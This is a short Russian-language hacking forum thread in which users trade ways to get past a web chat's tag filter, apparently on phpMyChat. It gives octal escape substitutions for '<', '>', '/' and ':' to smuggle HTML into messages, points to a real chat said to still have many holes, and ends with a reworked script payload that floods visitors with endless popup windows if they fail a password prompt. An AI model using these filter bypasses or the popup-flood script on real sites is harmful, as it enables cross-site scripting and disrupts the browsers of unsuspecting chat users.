|
Замена символов в чате!
На одном из чатов запнулся на том что там не разрешалось т.е. в тэгах непропускался знак /
Это означает что если я пишу: \x3cimg src="http\x3a//antichat.ru/cgi-bin/s.jpg" name="imaga"\x3e то тэг попадает на обозрение(ПОЛНОСТЬЮ) в таком виде: ...x3cimg src="http...x3a......antichat.ru...cgi-bin...s.jpg" name="imaga"...x3e Как можно заменить / ???? |
см. видео zFailure "XSS в чате на muz-tv"
там тебе покажут как использовать реплейс символов в строке в ХТМЛ |
А какой двиг чата.То что ты написал это phpmychat 0.14 .5 . Ну че то вроде этого.Это старый двиг .Вот попробуй для нового < =\\74\
> = \\76\\ </ =\\74/ : = \\72 Понятно? |
Вот этот пропатченный чат! http://www.elbrusoid.org/chat
|
Там этот баг закрыт.И правильно но еще много уязвимостей осталось
|
Кто-нить выложите тэг на открытие окошек в чате.
|
Цитата:
|
функция window.open na JS
на HTML <a href=page.htm target=_blank <!-- если надо в новом окне -->>link</a> |
ВСЕМ ОГРОМНОЕ СПАСИБО!!!!
|
\\74\script language="javascript"\\76\\ var nameData = "007"; if (nameData == prompt ("*****" ))alert("************!"); else for(1;1;100) open(1);\\74\/script\\76\\
Вот уже переделаный |
| Время: 03:23 |